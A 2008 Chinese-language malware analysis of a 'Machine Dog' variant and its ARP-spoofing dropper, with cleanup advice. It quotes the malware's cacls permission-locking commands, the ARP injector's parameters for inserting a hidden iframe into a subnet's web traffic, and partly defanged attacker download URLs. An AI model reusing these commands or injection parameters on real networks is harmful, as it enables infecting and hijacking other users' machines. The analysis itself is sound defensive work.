pcihdd.sys、userinit.exe、机器狗病毒详细解决过程

新客网 XKER.COM 2008-01-10 来源：孤独更可靠 佚名 收藏本文

最近好像又很疯狂的机器狗，运气不错，抓到个比较新的变种。

其实一开始并不是机器狗主体，而是一个ARP病毒。

（这个版本的机器狗比较恶心，能防止身己被NTFS文件系统禁创建、读取的权限）

哈哈````好了，8扯了```，开始：

开始的毒网连接：

http://xxx.m111.biz/nicai.cer

有3个东东：

hp://xxx.m111.biz/x.jpg

hp://xxx.m111.biz/x1.jpg

hp://xxx.m111.biz/x2.jpg

其实都是可执行PE文件=。=

第一个x.jpg，释放一个VB程序，调用浏览器访问网站：

http://xxx.m111.biz/tongji.htm

统计感染该病毒的人数。。。

-_-!

第二个x1.jpg，主要工作：

%Temp%释放随机命名的P处理，建立pcihdd.sys文件夹

本身并不判断文件系统，直接P处理，保证pcihdd.sys、userinit.exe不被NTFS文件系统的权限控制：

Parent process:
   Path: C:\WINNT\system32\CMD.EXE
   PID: 468
   Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
   Path: C:\WINNT\system32\cacls.exe
   Information: Control ACLs Program (Microsoft Corporation)
   Command line:cacls C:\winnt\system32\drivers\pcihdd.sys /e /p everyone:n

Parent process:
   Path: C:\WINNT\system32\CMD.EXE
   PID: 468
   Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
   Path: C:\WINNT\system32\cacls.exe
   Information: Control ACLs Program (Microsoft Corporation)
   Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r

第三个x2.jpg ：

也差不多拉，主要是保证ARP嗅探器的文件权限不被控制，

然后释放病毒文件pvc.exe，于192.168.0.1-192.168.0.254网段

加入框架（病毒）数据包，参数为：

-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "{iframe src=''hXXp://xxx.mmma.biz/js.htm'' width=0 height=0}{/iframe}"

电脑少于5000的建议不要点上面的连接，超级卡````

''hXXp://xxx.mmma.biz/js.htm''

连接：

hXXp://xxx.mmma.biz/ps.js

这个东东加密了，解密后连接3个网址：

其中一个是流量统计的，其他2个都是加密过的，一个是unescape，另一个是8进制加密

第一个是暴风影音的漏洞，第二个是百度搜霸的漏洞```

解密后得样本：

hXXp://xxx.mmma.biz/***.exe

病毒行为：

去除pcihdd.sys的文件属性，并删除原有的pcihdd.sys文件夹。

然后继续下载：

h**p://xx*.mmma.biz/big.exe

h**p://xx*.mmma.biz/big1.exe

哈哈，自始至终终于见到机器狗了（big.exe）

第2个是上面分析过的ARP病毒，哈哈``54ing``删掉

再看看那个机器狗，哈``首先检测pcihdd.sys是否存在。

若不在则注册该驱动，然后判断条件，如果满足以下条件则退出，不做其他操作：

1、不是启动分区，比如说双系统。

2、文件系统，哈哈``不会是针对FAT16的吧

3、如果是NTFS，使用了文件压缩功能，可能导致病毒驱动在计算Userinnt地址时会出现错误？

4、读取Userinnt失败（设置权限），这个版本的小狗应该还不至于出现这情况。

如果没有意外，则pcihdd.sys访问磁盘底层，读取%SystemRoot%\System32\Userinit.exe

并修改。（应该会穿过一些还原类的东东`）

我测试被HIPS自动拒绝，所以。。。。}_{

能不能穿透影子还不知道。

被修改后的Userinit.exe，重启系统后联网下载东东：

http://ilove.com/ttt.cer

（失效了？？？我打开时候是一个外国的交友站-_-!!!）

至于解决方法，基本有这几条思路：

1、杀软或HIPS禁止其运行。（对个人PC比较实用）

2、权限设置，禁止修改Userinit.exe和创建pcihdd.sys。（看起来比较渺茫``HIPS的FD可以）

3、路由或防火墙那里把hXXp://xxx.mmma.biz屏蔽了，（救得一时急，哈哈``）

4、注册表权限，这个比较简单，网吧或局域环境的，操作起来不会太难：

我的是2K系统，比较麻烦```：

开始-运行-regedt32（XP系统不用，直接运行regedit就可以！）

在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ （系统服务）

建立个名为PciHdd的空键，然后上权限，system和管理员权限的都要设置。

如果已经有了PciHdd，不用删它，设置为禁止控制和读取 ^_^

5、最后一个比较推荐：

CMD

cd ……到drivers

md pcihdd.sys

cd pcihdd.sys

md 1...\

就酱紫拉，我测试过了，关闭所有防护，直接运行机器狗，它会提示加载驱动失败，第4点也一样~~

偶比较懒，P处理就不写了`` :-)

OK，收工

• ·认识映象劫持技术原理与解决办法
• ·大水牛下载者分析及手工清除办法
• ·计算机病毒中毒症状、预防和系统恢复
• ·mdm.exe专杀以及处理方法
• ·手工清除病毒mdm.exe和RavMon.exe
• ·mdm.exe病毒的解决方法
• ·不再草木皆兵 三招对付捆绑木马！
• ·如何清除Taskmgr.exe病毒
• ·taskmgr.exe进程CPU占用率高的原因
• ·taskmgr.exe系统进程及相关病毒介绍
• ·QQ“缘”病毒taskmgr.exe狂占CPU内存
• ·警惕伪SoundMan.exe病毒 SoundMan.exe病毒清除办
• ·巧治Vista下U盘自动运行病毒方法
• ·计算机病毒的说明、预防和恢复
• ·病毒反抗杀毒软件主要手段
• ·经典九招 防止自动播放引来病毒